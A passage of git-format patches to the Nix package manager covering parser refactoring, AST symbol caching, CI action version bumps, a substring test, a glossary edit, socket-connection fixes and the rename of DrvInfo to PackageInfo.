bindVars. split this bit apart (retaining the previous name in EvalState) and have the parser really do *only* parsing, decoupled from EvalState. --- src/libexpr/eval.cc | 16 ++++++++++++++++ src/libexpr/lexer.l | 6 +++--- src/libexpr/parser-state.hh | 17 +++++++++-------- src/libexpr/parser.y | 36 +++++++++++++++++++++++++----------- 4 files changed, 53 insertions(+), 22 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 6eee7cdce..b05ccfc85 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -22,6 +22,7 @@ #include "fetch-to-store.hh" #include "tarball.hh" #include "flake/flakeref.hh" +#include "parser-tab.hh" #include #include @@ -2800,6 +2801,21 @@ std::optional EvalState::resolveSearchPathPath(const SearchPath::Pa } +Expr * EvalState::parse( + char * text, + size_t length, + Pos::Origin origin, + const SourcePath & basePath, + std::shared_ptr & staticEnv) +{ + auto result = parseExprFromBuf(text, length, origin, basePath, symbols, positions, rootFS); + + result->bindVars(*this, staticEnv); + + return result; +} + + std::string ExternalValueBase::coerceToString(const Pos & pos, NixStringContext & context, bool copyMore, bool copyToStore) const { throw TypeError({ diff --git a/src/libexpr/lexer.l b/src/libexpr/lexer.l index fae0e7a85..d7a0b5048 100644 --- a/src/libexpr/lexer.l +++ b/src/libexpr/lexer.l @@ -148,7 +148,7 @@ or { return OR_KW; } } catch (const boost::bad_lexical_cast &) { throw ParseError({ .msg = hintfmt("invalid integer '%1%'", yytext), - .errPos = state->state.positions[CUR_POS], + .errPos = state->positions[CUR_POS], }); } return INT_LIT; @@ -158,7 +158,7 @@ or { return OR_KW; } if (errno != 0) throw ParseError({ .msg = hintfmt("invalid float '%1%'", yytext), - .errPos = state->state.positions[CUR_POS], + .errPos = state->positions[CUR_POS], }); return FLOAT_LIT; } @@ -287,7 +287,7 @@ or { return OR_KW; } <> { throw ParseError({ .msg = hintfmt("path has a trailing slash"), - .errPos = state->state.positions[CUR_POS], + .errPos = state->positions[CUR_POS], }); } diff --git a/src/libexpr/parser-state.hh b/src/libexpr/parser-state.hh index 167d3f4ae..6ab9fc962 100644 --- a/src/libexpr/parser-state.hh +++ b/src/libexpr/parser-state.hh @@ -37,11 +37,12 @@ struct ParserLocation { }; struct ParserState { - EvalState & state; SymbolTable & symbols; + PosTable & positions; Expr * result; SourcePath basePath; PosTable::Origin origin; + const ref rootFS; void dupAttr(const AttrPath & attrPath, const PosIdx pos, const PosIdx prevPos); void dupAttr(Symbol attr, const PosIdx pos, const PosIdx prevPos); @@ -56,16 +57,16 @@ inline void ParserState::dupAttr(const AttrPath & attrPath, const PosIdx pos, co { throw ParseError({ .msg = hintfmt("attribute '%1%' already defined at %2%", - showAttrPath(state.symbols, attrPath), state.positions[prevPos]), - .errPos = state.positions[pos] + showAttrPath(symbols, attrPath), positions[prevPos]), + .errPos = positions[pos] }); } inline void ParserState::dupAttr(Symbol attr, const PosIdx pos, const PosIdx prevPos) { throw ParseError({ - .msg = hintfmt("attribute '%1%' already defined at %2%", state.symbols[attr], state.positions[prevPos]), - .errPos = state.positions[pos] + .msg = hintfmt("attribute '%1%' already defined at %2%", symbols[attr], positions[prevPos]), + .errPos = positions[pos] }); } @@ -146,13 +147,13 @@ inline Formals * ParserState::validateFormals(Formals * formals, PosIdx pos, Sym if (duplicate) throw ParseError({ .msg = hintfmt("duplicate formal function argument '%1%'", symbols[duplicate->first]), - .errPos = state.positions[duplicate->second] + .errPos = positions[duplicate->second] }); if (arg && formals->has(arg)) throw ParseError({ .msg = hintfmt("duplicate formal function argument '%1%'", symbols[arg]), - .errPos = state.positions[pos] + .errPos = positions[pos] }); return formals; @@ -256,7 +257,7 @@ inline Expr * ParserState::stripIndentation(const PosIdx pos, inline PosIdx ParserState::at(const ParserLocation & loc) { - return state.positions.add(origin, loc.first_line, loc.first_column); + return positions.add(origin, loc.first_line, loc.first_column); } } diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index 519d6b11f..faf5e897f 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -32,6 +32,19 @@ #define YY_DECL int yylex \ (YYSTYPE * yylval_param, YYLTYPE * yylloc_param, yyscan_t yyscanner, nix::ParserState * state) +namespace nix { + +Expr * parseExprFromBuf( + char * text, + size_t length, + Pos::Origin origin, + const SourcePath & basePath, + SymbolTable & symbols, + PosTable & positions, + const ref rootFS); + +} + #endif } @@ -52,7 +65,7 @@ void yyerror(YYLTYPE * loc, yyscan_t scanner, ParserState * state, const char * { throw ParseError({ .msg = hintfmt(error), - .errPos = state->state.positions[state->at(*loc)] + .errPos = state->positions[state->at(*loc)] }); } @@ -141,7 +154,7 @@ expr_function { if (!$2->dynamicAttrs.empty()) throw ParseError({ .msg = hintfmt("dynamic attributes not allowed in let"), - .errPos = state->state.positions[CUR_POS] + .errPos = state->positions[CUR_POS] }); $$ = new ExprLet($2, $4); } @@ -231,7 +244,7 @@ expr_simple if (noURLLiterals) throw ParseError({ .msg = hintfmt("URL literals are disabled"), - .errPos = state->state.positions[CUR_POS] + .errPos = state->positions[CUR_POS] }); $$ = new ExprString(std::string($1)); } @@ -271,7 +284,7 @@ path_start /* add back in the trailing '/' to the first segment */ if ($1.p[$1.l-1] == '/' && $1.l > 1) path += "/"; - $$ = new ExprPath(ref(state->state.rootFS), std::move(path)); + $$ = new ExprPath(ref(state->rootFS), std::move(path)); } | HPATH { if (evalSettings.pureEval) { @@ -281,7 +294,7 @@ path_start ); } Path path(getHome() + std::string($1.p + 1, $1.l - 1)); - $$ = new ExprPath(ref(state->state.rootFS), std::move(path)); + $$ = new ExprPath(ref(state->rootFS), std::move(path)); } ; @@ -327,7 +340,7 @@ attrs } else throw ParseError({ .msg = hintfmt("dynamic attributes not allowed in inherit"), - .errPos = state->state.positions[state->at(@2)] + .errPos = state->positions[state->at(@2)] }); } | { $$ = new AttrPath; } @@ -394,19 +407,22 @@ formal namespace nix { -Expr * EvalState::parse( +Expr * parseExprFromBuf( char * text, size_t length, Pos::Origin origin, const SourcePath & basePath, - std::shared_ptr & staticEnv) + SymbolTable & symbols, + PosTable & positions, + const ref rootFS) { yyscan_t scanner; ParserState state { - .state = *this, .symbols = symbols, + .positions = positions, .basePath = basePath, .origin = {origin}, + .rootFS = rootFS, }; yylex_init(&scanner); @@ -415,8 +431,6 @@ Expr * EvalState::parse( yy_scan_buffer(text, length, scanner); yyparse(scanner, &state); - state.result->bindVars(*this, staticEnv); - return state.result; } From 09a1128d9e2ff0ae6176784938047350d6f8a782 Mon Sep 17 00:00:00 2001 From: pennae Date: Mon, 15 Jan 2024 16:52:18 +0100 Subject: [PATCH 269/654] don't repeatedly look up ast internal symbols these symbols are used a *lot*, so it makes sense to cache them. this mostly increases clarity of the code (however clear one may wish to call the parser desugaring here), but it also provides a small performance benefit. --- src/libexpr/eval.cc | 12 +++++++++++- src/libexpr/eval.hh | 2 ++ src/libexpr/nixexpr.hh | 5 +++++ src/libexpr/parser-state.hh | 1 + src/libexpr/parser.y | 31 +++++++++++++++++-------------- 5 files changed, 36 insertions(+), 15 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index b05ccfc85..dc9167144 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -419,6 +419,16 @@ EvalState::EvalState( , sPath(symbols.create("path")) , sPrefix(symbols.create("prefix")) , sOutputSpecified(symbols.create("outputSpecified")) + , exprSymbols{ + .sub = symbols.create("__sub"), + .lessThan = symbols.create("__lessThan"), + .mul = symbols.create("__mul"), + .div = symbols.create("__div"), + .or_ = symbols.create("or"), + .findFile = symbols.create("__findFile"), + .nixPath = symbols.create("__nixPath"), + .body = symbols.create("body") + } , repair(NoRepair) , emptyBindings(0) , rootFS( @@ -2808,7 +2818,7 @@ Expr * EvalState::parse( const SourcePath & basePath, std::shared_ptr & staticEnv) { - auto result = parseExprFromBuf(text, length, origin, basePath, symbols, positions, rootFS); + auto result = parseExprFromBuf(text, length, origin, basePath, symbols, positions, rootFS, exprSymbols); result->bindVars(*this, staticEnv); diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index 9141156b1..2368187b1 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -207,6 +207,8 @@ public: sPrefix, sOutputSpecified; + const Expr::AstSymbols exprSymbols; + /** * If set, force copying files to the Nix store even if they * already exist there. diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh index 3cd46ca27..b6189c2a9 100644 --- a/src/libexpr/nixexpr.hh +++ b/src/libexpr/nixexpr.hh @@ -140,6 +140,11 @@ std::string showAttrPath(const SymbolTable & symbols, const AttrPath & attrPath) struct Expr { + struct AstSymbols { + Symbol sub, lessThan, mul, div, or_, findFile, nixPath, body; + }; + + static unsigned long nrExprs; Expr() { nrExprs++; diff --git a/src/libexpr/parser-state.hh b/src/libexpr/parser-state.hh index 6ab9fc962..a5b932ae8 100644 --- a/src/libexpr/parser-state.hh +++ b/src/libexpr/parser-state.hh @@ -43,6 +43,7 @@ struct ParserState { SourcePath basePath; PosTable::Origin origin; const ref rootFS; + const Expr::AstSymbols & s; void dupAttr(const AttrPath & attrPath, const PosIdx pos, const PosIdx prevPos); void dupAttr(Symbol attr, const PosIdx pos, const PosIdx prevPos); diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index faf5e897f..e95da37f7 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -41,7 +41,8 @@ Expr * parseExprFromBuf( const SourcePath & basePath, SymbolTable & symbols, PosTable & positions, - const ref rootFS); + const ref rootFS, + const Expr::AstSymbols & astSymbols); } @@ -168,13 +169,13 @@ expr_if expr_op : '!' expr_op %prec NOT { $$ = new ExprOpNot($2); } - | '-' expr_op %prec NEGATE { $$ = new ExprCall(CUR_POS, new ExprVar(state->symbols.create("__sub")), {new ExprInt(0), $2}); } + | '-' expr_op %prec NEGATE { $$ = new ExprCall(CUR_POS, new ExprVar(state->s.sub), {new ExprInt(0), $2}); } | expr_op EQ expr_op { $$ = new ExprOpEq($1, $3); } | expr_op NEQ expr_op { $$ = new ExprOpNEq($1, $3); } - | expr_op '<' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__lessThan")), {$1, $3}); } - | expr_op LEQ expr_op { $$ = new ExprOpNot(new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__lessThan")), {$3, $1})); } - | expr_op '>' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__lessThan")), {$3, $1}); } - | expr_op GEQ expr_op { $$ = new ExprOpNot(new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__lessThan")), {$1, $3})); } + | expr_op '<' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->s.lessThan), {$1, $3}); } + | expr_op LEQ expr_op { $$ = new ExprOpNot(new ExprCall(state->at(@2), new ExprVar(state->s.lessThan), {$3, $1})); } + | expr_op '>' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->s.lessThan), {$3, $1}); } + | expr_op GEQ expr_op { $$ = new ExprOpNot(new ExprCall(state->at(@2), new ExprVar(state->s.lessThan), {$1, $3})); } | expr_op AND expr_op { $$ = new ExprOpAnd(state->at(@2), $1, $3); } | expr_op OR expr_op { $$ = new ExprOpOr(state->at(@2), $1, $3); } | expr_op IMPL expr_op { $$ = new ExprOpImpl(state->at(@2), $1, $3); } @@ -182,9 +183,9 @@ expr_op | expr_op '?' attrpath { $$ = new ExprOpHasAttr($1, std::move(*$3)); delete $3; } | expr_op '+' expr_op { $$ = new ExprConcatStrings(state->at(@2), false, new std::vector >({{state->at(@1), $1}, {state->at(@3), $3}})); } - | expr_op '-' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__sub")), {$1, $3}); } - | expr_op '*' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__mul")), {$1, $3}); } - | expr_op '/' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__div")), {$1, $3}); } + | expr_op '-' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->s.sub), {$1, $3}); } + | expr_op '*' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->s.mul), {$1, $3}); } + | expr_op '/' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->s.div), {$1, $3}); } | expr_op CONCAT expr_op { $$ = new ExprOpConcatLists(state->at(@2), $1, $3); } | expr_app ; @@ -208,7 +209,7 @@ expr_select | /* Backwards compatibility: because Nixpkgs has a rarely used function named ‘or’, allow stuff like ‘map or [...]’. */ expr_simple OR_KW - { $$ = new ExprCall(CUR_POS, $1, {new ExprVar(CUR_POS, state->symbols.create("or"))}); } + { $$ = new ExprCall(CUR_POS, $1, {new ExprVar(CUR_POS, state->s.or_)}); } | expr_simple ; @@ -235,8 +236,8 @@ expr_simple | SPATH { std::string path($1.p + 1, $1.l - 2); $$ = new ExprCall(CUR_POS, - new ExprVar(state->symbols.create("__findFile")), - {new ExprVar(state->symbols.create("__nixPath")), + new ExprVar(state->s.findFile), + {new ExprVar(state->s.nixPath), new ExprString(std::move(path))}); } | URI { @@ -252,7 +253,7 @@ expr_simple /* Let expressions `let {..., body = ...}' are just desugared into `(rec {..., body = ...}).body'. */ | LET '{' binds '}' - { $3->recursive = true; $$ = new ExprSelect(noPos, $3, state->symbols.create("body")); } + { $3->recursive = true; $$ = new ExprSelect(noPos, $3, state->s.body); } | REC '{' binds '}' { $3->recursive = true; $$ = $3; } | '{' binds '}' @@ -414,7 +415,8 @@ Expr * parseExprFromBuf( const SourcePath & basePath, SymbolTable & symbols, PosTable & positions, - const ref rootFS) + const ref rootFS, + const Expr::AstSymbols & astSymbols) { yyscan_t scanner; ParserState state { @@ -423,6 +425,7 @@ Expr * parseExprFromBuf( .basePath = basePath, .origin = {origin}, .rootFS = rootFS, + .s = astSymbols, }; yylex_init(&scanner); From e0a76430861efbcfaf14c8b3691a091e6e72a8ed Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 15 Jan 2024 22:35:12 +0000 Subject: [PATCH 270/654] Bump cachix/install-nix-action from 24 to 25 Bumps [cachix/install-nix-action](https://github.com/cachix/install-nix-action) from 24 to 25. - [Release notes](https://github.com/cachix/install-nix-action/releases) - [Commits](https://github.com/cachix/install-nix-action/compare/v24...v25) --- updated-dependencies: - dependency-name: cachix/install-nix-action dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] --- .github/workflows/ci.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index aa2551424..8d88de4b1 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -20,7 +20,7 @@ jobs: - uses: actions/checkout@v4 with: fetch-depth: 0 - - uses: cachix/install-nix-action@v24 + - uses: cachix/install-nix-action@v25 with: # The sandbox would otherwise be disabled by default on Darwin extra_nix_config: "sandbox = true" @@ -62,7 +62,7 @@ jobs: with: fetch-depth: 0 - run: echo CACHIX_NAME="$(echo $GITHUB_REPOSITORY-install-tests | tr "[A-Z]/" "[a-z]-")" >> $GITHUB_ENV - - uses: cachix/install-nix-action@v24 + - uses: cachix/install-nix-action@v25 with: install_url: https://releases.nixos.org/nix/nix-2.13.3/install - uses: cachix/cachix-action@v13 @@ -84,7 +84,7 @@ jobs: steps: - uses: actions/checkout@v4 - run: echo CACHIX_NAME="$(echo $GITHUB_REPOSITORY-install-tests | tr "[A-Z]/" "[a-z]-")" >> $GITHUB_ENV - - uses: cachix/install-nix-action@v24 + - uses: cachix/install-nix-action@v25 with: install_url: '${{needs.installer.outputs.installerURL}}' install_options: "--tarball-url-prefix https://${{ env.CACHIX_NAME }}.cachix.org/serve" @@ -114,7 +114,7 @@ jobs: - uses: actions/checkout@v4 with: fetch-depth: 0 - - uses: cachix/install-nix-action@v24 + - uses: cachix/install-nix-action@v25 with: install_url: https://releases.nixos.org/nix/nix-2.13.3/install - run: echo CACHIX_NAME="$(echo $GITHUB_REPOSITORY-install-tests | tr "[A-Z]/" "[a-z]-")" >> $GITHUB_ENV From bf7754c0991c33146da9c339a71d661615afc93a Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 15 Jan 2024 22:35:15 +0000 Subject: [PATCH 271/654] Bump cachix/cachix-action from 13 to 14 Bumps [cachix/cachix-action](https://github.com/cachix/cachix-action) from 13 to 14. - [Release notes](https://github.com/cachix/cachix-action/releases) - [Commits](https://github.com/cachix/cachix-action/compare/v13...v14) --- updated-dependencies: - dependency-name: cachix/cachix-action dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] --- .github/workflows/ci.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index aa2551424..878720acc 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -25,7 +25,7 @@ jobs: # The sandbox would otherwise be disabled by default on Darwin extra_nix_config: "sandbox = true" - run: echo CACHIX_NAME="$(echo $GITHUB_REPOSITORY-install-tests | tr "[A-Z]/" "[a-z]-")" >> $GITHUB_ENV - - uses: cachix/cachix-action@v13 + - uses: cachix/cachix-action@v14 if: needs.check_secrets.outputs.cachix == 'true' with: name: '${{ env.CACHIX_NAME }}' @@ -65,7 +65,7 @@ jobs: - uses: cachix/install-nix-action@v24 with: install_url: https://releases.nixos.org/nix/nix-2.13.3/install - - uses: cachix/cachix-action@v13 + - uses: cachix/cachix-action@v14 with: name: '${{ env.CACHIX_NAME }}' signingKey: '${{ secrets.CACHIX_SIGNING_KEY }}' @@ -119,7 +119,7 @@ jobs: install_url: https://releases.nixos.org/nix/nix-2.13.3/install - run: echo CACHIX_NAME="$(echo $GITHUB_REPOSITORY-install-tests | tr "[A-Z]/" "[a-z]-")" >> $GITHUB_ENV - run: echo NIX_VERSION="$(nix --experimental-features 'nix-command flakes' eval .\#default.version | tr -d \")" >> $GITHUB_ENV - - uses: cachix/cachix-action@v13 + - uses: cachix/cachix-action@v14 if: needs.check_secrets.outputs.cachix == 'true' with: name: '${{ env.CACHIX_NAME }}' From cbc319e9be3b29e3eb29a6e4cf08db1e0363d7bd Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Tue, 16 Jan 2024 12:18:02 +0100 Subject: [PATCH 272/654] tests/functional/lang: Test substring with negative length --- tests/functional/lang/eval-okay-substring.exp | 2 +- tests/functional/lang/eval-okay-substring.nix | 2 ++ 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/tests/functional/lang/eval-okay-substring.exp b/tests/functional/lang/eval-okay-substring.exp index 6aace04b0..f48b4623a 100644 --- a/tests/functional/lang/eval-okay-substring.exp +++ b/tests/functional/lang/eval-okay-substring.exp @@ -1 +1 @@ -"ooxfoobarybarzobaabbc" +"ooxfoobarybarzobaabbc_bad" diff --git a/tests/functional/lang/eval-okay-substring.nix b/tests/functional/lang/eval-okay-substring.nix index 424af00d9..54c97e162 100644 --- a/tests/functional/lang/eval-okay-substring.nix +++ b/tests/functional/lang/eval-okay-substring.nix @@ -19,3 +19,5 @@ substring 1 2 s + substring 3 1 s + "c" + substring 5 10 "perl" ++ "_" ++ substring 3 (-1) "tebbad" From baea5f42c602c0233c3ed9c2d668409f86f901b9 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Tue, 16 Jan 2024 14:50:53 +0100 Subject: [PATCH 273/654] doc/glossary: Simplify software package definition Co-authored-by: Valentin Gagarin --- doc/manual/src/glossary.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/manual/src/glossary.md b/doc/manual/src/glossary.md index 5e3c0e024..3c0570a44 100644 --- a/doc/manual/src/glossary.md +++ b/doc/manual/src/glossary.md @@ -273,7 +273,7 @@ - [package]{#package} - 1. A software package; typically a collection of programs, files and data. + 1. A software package; a collection of files and other data. 2. A [package attribute set]. From 0b1d93d2bae5fda9924f13246d7a667ce4392a4d Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Tue, 16 Jan 2024 15:23:22 +0100 Subject: [PATCH 274/654] Sleep a bit between attempts to connect to the root server --- src/libstore/gc.cc | 1 + 1 file changed, 1 insertion(+) diff --git a/src/libstore/gc.cc b/src/libstore/gc.cc index f60011f95..cb820e2d5 100644 --- a/src/libstore/gc.cc +++ b/src/libstore/gc.cc @@ -154,6 +154,7 @@ void LocalStore::addTempRoot(const StorePath & path) if (e.errNo == ECONNREFUSED || e.errNo == ENOENT) { debug("GC socket connection refused: %s", e.msg()); fdRootsSocket->close(); + std::this_thread::sleep_for(std::chrono::milliseconds(100)); goto restart; } throw; From d005bade7f3339cc68bee12ce13d863d51d54dc4 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Tue, 16 Jan 2024 15:23:46 +0100 Subject: [PATCH 275/654] connect(): Propagate errno from the child process This is necessary on macOS since addTempRoot() relies on errno. --- src/libutil/unix-domain-socket.cc | 39 +++++++++++++++++++++---------- 1 file changed, 27 insertions(+), 12 deletions(-) diff --git a/src/libutil/unix-domain-socket.cc b/src/libutil/unix-domain-socket.cc index 8949461d2..05bbb5ba3 100644 --- a/src/libutil/unix-domain-socket.cc +++ b/src/libutil/unix-domain-socket.cc @@ -1,6 +1,7 @@ #include "file-system.hh" #include "processes.hh" #include "unix-domain-socket.hh" +#include "util.hh" #include #include @@ -75,21 +76,35 @@ void connect(int fd, const std::string & path) addr.sun_family = AF_UNIX; if (path.size() + 1 >= sizeof(addr.sun_path)) { + Pipe pipe; + pipe.create(); Pid pid = startProcess([&]() { - Path dir = dirOf(path); - if (chdir(dir.c_str()) == -1) - throw SysError("chdir to '%s' failed", dir); - std::string base(baseNameOf(path)); - if (base.size() + 1 >= sizeof(addr.sun_path)) - throw Error("socket path '%s' is too long", base); - memcpy(addr.sun_path, base.c_str(), base.size() + 1); - if (connect(fd, (struct sockaddr *) &addr, sizeof(addr)) == -1) - throw SysError("cannot connect to socket at '%s'", path); - _exit(0); + try { + pipe.readSide.close(); + Path dir = dirOf(path); + if (chdir(dir.c_str()) == -1) + throw SysError("chdir to '%s' failed", dir); + std::string base(baseNameOf(path)); + if (base.size() + 1 >= sizeof(addr.sun_path)) + throw Error("socket path '%s' is too long", base); + memcpy(addr.sun_path, base.c_str(), base.size() + 1); + if (connect(fd, (struct sockaddr *) &addr, sizeof(addr)) == -1) + throw SysError("cannot connect to socket at '%s'", path); + writeFull(pipe.writeSide.get(), "0\n"); + } catch (SysError & e) { + writeFull(pipe.writeSide.get(), fmt("%d\n", e.errNo)); + } catch (...) { + writeFull(pipe.writeSide.get(), "-1\n"); + } }); - int status = pid.wait(); - if (status != 0) + pipe.writeSide.close(); + auto errNo = string2Int(chomp(drainFD(pipe.readSide.get()))); + if (!errNo || *errNo == -1) throw Error("cannot connect to socket at '%s'", path); + else if (*errNo > 0) { + errno = *errNo; + throw SysError("cannot connect to socket at '%s'", path); + } } else { memcpy(addr.sun_path, path.c_str(), path.size() + 1); if (connect(fd, (struct sockaddr *) &addr, sizeof(addr)) == -1) From 65255edc9b0c2bbe8b0be50ac7b2671b50309ea8 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Tue, 16 Jan 2024 15:25:04 +0100 Subject: [PATCH 276/654] DerivationInfo -> PackageInfo This does not yet resolve the coupling between packages and derivations, but it makes the code more consistent with the terminology, and it accentuates places where the coupling is obvious, such as auto drvPath = packageInfo.queryDrvPath(); if (!drvPath) throw Error("'%s' is not a derivation", what()); ... which isn't wrong, and in my opinion, doesn't even look wrong, because it just reflects the current logic. However, I do like that we can now start to see in the code that this coupling is perhaps a bit arbitrary. After this rename, we can bring the DerivingPath concept into type and start to lift this limitation. --- src/libcmd/installable-attr-path.cc | 10 +-- src/libcmd/installable-value.hh | 2 +- src/libcmd/installables.hh | 2 +- src/libcmd/repl.cc | 6 +- src/libexpr/get-drvs.cc | 48 ++++++------- src/libexpr/get-drvs.hh | 18 ++--- src/nix-build/nix-build.cc | 16 ++--- src/nix-env/nix-env.cc | 94 +++++++++++++------------- src/nix-env/user-env.cc | 8 +-- src/nix-env/user-env.hh | 4 +- src/nix-instantiate/nix-instantiate.cc | 2 +- src/nix/flake.cc | 6 +- src/nix/profile.cc | 6 +- 13 files changed, 111 insertions(+), 111 deletions(-) diff --git a/src/libcmd/installable-attr-path.cc b/src/libcmd/installable-attr-path.cc index 06e507872..3ec1c1614 100644 --- a/src/libcmd/installable-attr-path.cc +++ b/src/libcmd/installable-attr-path.cc @@ -58,22 +58,22 @@ DerivedPathsWithInfo InstallableAttrPath::toDerivedPaths() Bindings & autoArgs = *cmd.getAutoArgs(*state); - DrvInfos drvInfos; - getDerivations(*state, *v, "", autoArgs, drvInfos, false); + PackageInfos packageInfos; + getDerivations(*state, *v, "", autoArgs, packageInfos, false); // Backward compatibility hack: group results by drvPath. This // helps keep .all output together. std::map byDrvPath; - for (auto & drvInfo : drvInfos) { - auto drvPath = drvInfo.queryDrvPath(); + for (auto & packageInfo : packageInfos) { + auto drvPath = packageInfo.queryDrvPath(); if (!drvPath) throw Error("'%s' is not a derivation", what()); auto newOutputs = std::visit(overloaded { [&](const ExtendedOutputsSpec::Default & d) -> OutputsSpec { std::set outputsToInstall; - for (auto & output : drvInfo.queryOutputs(false, true)) + for (auto & output : packageInfo.queryOutputs(false, true)) outputsToInstall.insert(output.first); return OutputsSpec::Names { std::move(outputsToInstall) }; }, diff --git a/src/libcmd/installable-value.hh b/src/libcmd/installable-value.hh index 3138ce8ec..f300d392b 100644 --- a/src/libcmd/installable-value.hh +++ b/src/libcmd/installable-value.hh @@ -6,7 +6,7 @@ namespace nix { -struct DrvInfo; +struct PackageInfo; struct SourceExprCommand; namespace eval_cache { class EvalCache; class AttrCursor; } diff --git a/src/libcmd/installables.hh b/src/libcmd/installables.hh index 95e8841ca..bf5759230 100644 --- a/src/libcmd/installables.hh +++ b/src/libcmd/installables.hh @@ -12,7 +12,7 @@ namespace nix { -struct DrvInfo; +struct PackageInfo; enum class Realise { /** diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index 918b2e53a..d7d8f9819 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -450,10 +450,10 @@ static bool isVarName(std::string_view s) StorePath NixRepl::getDerivationPath(Value & v) { - auto drvInfo = getDerivation(*state, v, false); - if (!drvInfo) + auto packageInfo = getDerivation(*state, v, false); + if (!packageInfo) throw Error("expression does not evaluate to a derivation, so I can't build it"); - auto drvPath = drvInfo->queryDrvPath(); + auto drvPath = packageInfo->queryDrvPath(); if (!drvPath) throw Error("expression did not evaluate to a valid derivation (no 'drvPath' attribute)"); if (!state->store->isValidPath(*drvPath)) diff --git a/src/libexpr/get-drvs.cc b/src/libexpr/get-drvs.cc index a6441871c..51449ccb3 100644 --- a/src/libexpr/get-drvs.cc +++ b/src/libexpr/get-drvs.cc @@ -11,13 +11,13 @@ namespace nix { -DrvInfo::DrvInfo(EvalState & state, std::string attrPath, Bindings * attrs) +PackageInfo::PackageInfo(EvalState & state, std::string attrPath, Bindings * attrs) : state(&state), attrs(attrs), attrPath(std::move(attrPath)) { } -DrvInfo::DrvInfo(EvalState & state, ref store, const std::string & drvPathWithOutputs) +PackageInfo::PackageInfo(EvalState & state, ref store, const std::string & drvPathWithOutputs) : state(&state), attrs(nullptr), attrPath("") { auto [drvPath, selectedOutputs] = parsePathWithOutputs(*store, drvPathWithOutputs); @@ -45,7 +45,7 @@ DrvInfo::DrvInfo(EvalState & state, ref store, const std::string & drvPat } -std::string DrvInfo::queryName() const +std::string PackageInfo::queryName() const { if (name == "" && attrs) { auto i = attrs->find(state->sName); @@ -56,7 +56,7 @@ std::string DrvInfo::queryName() const } -std::string DrvInfo::querySystem() const +std::string PackageInfo::querySystem() const { if (system == "" && attrs) { auto i = attrs->find(state->sSystem); @@ -66,7 +66,7 @@ std::string DrvInfo::querySystem() const } -std::optional DrvInfo::queryDrvPath() const +std::optional PackageInfo::queryDrvPath() const { if (!drvPath && attrs) { Bindings::iterator i = attrs->find(state->sDrvPath); @@ -80,7 +80,7 @@ std::optional DrvInfo::queryDrvPath() const } -StorePath DrvInfo::requireDrvPath() const +StorePath PackageInfo::requireDrvPath() const { if (auto drvPath = queryDrvPath()) return *drvPath; @@ -88,7 +88,7 @@ StorePath DrvInfo::requireDrvPath() const } -StorePath DrvInfo::queryOutPath() const +StorePath PackageInfo::queryOutPath() const { if (!outPath && attrs) { Bindings::iterator i = attrs->find(state->sOutPath); @@ -102,7 +102,7 @@ StorePath DrvInfo::queryOutPath() const } -DrvInfo::Outputs DrvInfo::queryOutputs(bool withPaths, bool onlyOutputsToInstall) +PackageInfo::Outputs PackageInfo::queryOutputs(bool withPaths, bool onlyOutputsToInstall) { if (outputs.empty()) { /* Get the ‘outputs’ list. */ @@ -164,7 +164,7 @@ DrvInfo::Outputs DrvInfo::queryOutputs(bool withPaths, bool onlyOutputsToInstall } -std::string DrvInfo::queryOutputName() const +std::string PackageInfo::queryOutputName() const { if (outputName == "" && attrs) { Bindings::iterator i = attrs->find(state->sOutputName); @@ -174,7 +174,7 @@ std::string DrvInfo::queryOutputName() const } -Bindings * DrvInfo::getMeta() +Bindings * PackageInfo::getMeta() { if (meta) return meta; if (!attrs) return 0; @@ -186,7 +186,7 @@ Bindings * DrvInfo::getMeta() } -StringSet DrvInfo::queryMetaNames() +StringSet PackageInfo::queryMetaNames() { StringSet res; if (!getMeta()) return res; @@ -196,7 +196,7 @@ StringSet DrvInfo::queryMetaNames() } -bool 